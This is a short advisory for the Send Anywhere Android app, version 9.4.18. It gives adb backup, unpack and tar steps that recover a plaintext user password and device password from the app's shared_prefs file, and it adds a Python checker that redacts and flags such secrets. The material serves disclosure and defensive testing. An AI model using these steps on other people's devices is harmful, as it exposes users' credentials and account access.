Send Anywhere

a guest
Jun 14th, 2019
#Application: Send Anywhere
#Platform: Android
#Version: 9.4.18
#Severity: Medium
#Author: Loc Phan Van
#Impact: A non-root user can find out the username/password of a valid user and the user's access token via the shared_prefs folder

POC:

1. Back up the application
adb backup -f ~/sendanywhere.ab -noapk com.estmob.android.sendanywhere

2. Convert file sendanywhere.ab to sendanywhere.tar
java -jar abe.jar unpack ~/sendanywhere.ab sendanywhere.tar ""

3. Extract the archive
tar -xvf sendanywhere.tar

4. Look for the user's credentials in /shared_prefs/sendanywhere_device.xml

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="user_password">P4ssw0rd123</string>
<string name="device_id">1020427653131</string>
<string name="device_password">J6h49M5JXZw5w</string>
<string name="user_id">[email protected]</string>
<string name="advertising_id">5cfc8beb-f3ff-4b0a-a408-f5059c412d82</string>
</map>
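
Added example (not part of the original advisory): a Python check that a developer or tester could run over an extracted shared_prefs XML file to flag secret-looking keys stored in plaintext, such as user_password and device_password above. The key-name pattern, the function names and the sample values are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Key-name fragments that suggest a stored secret (assumed heuristic, not exhaustive).
SECRET_NAME = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key", re.I)

def redact(value):
    """Keep the first character and the length so the report does not leak the secret."""
    return (value[:1] + "*" * (len(value) - 1)) if value else ""

def find_plaintext_secrets(xml_text):
    """Return (key, redacted_value) for non-empty entries whose key name looks secret."""
    # Encode to bytes so the parser honours the file's own encoding declaration.
    root = ET.fromstring(xml_text.strip().encode("utf-8"))
    findings = []
    for entry in root:
        name = entry.get("name", "")
        if not SECRET_NAME.search(name):
            continue
        if entry.tag == "string":
            values = [entry.text or ""]
        elif entry.tag == "set":   # string sets nest <string> children
            values = [(s.text or "") for s in entry.findall("string")]
        else:                      # int/long/float/boolean carry value="..."
            values = [entry.get("value", "")]
        findings += [(name, redact(v)) for v in values if v]
    return findings

# Constructed sample using the key names from the file shown above;
# all values are placeholders, not real data.
SAMPLE = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="user_password">example-password</string>
    <string name="device_id">0000000000000</string>
    <string name="device_password">example-device-pw</string>
    <string name="user_id">user@example.invalid</string>
    <string name="advertising_id">00000000-0000-0000-0000-000000000000</string>
</map>"""

if __name__ == "__main__":
    for key, shown in find_plaintext_secrets(SAMPLE):
        print(f"plaintext secret in shared_prefs: {key} = {shown}")
```

Any finding means the value would also be present in an adb backup of the app, as in steps 1 to 4.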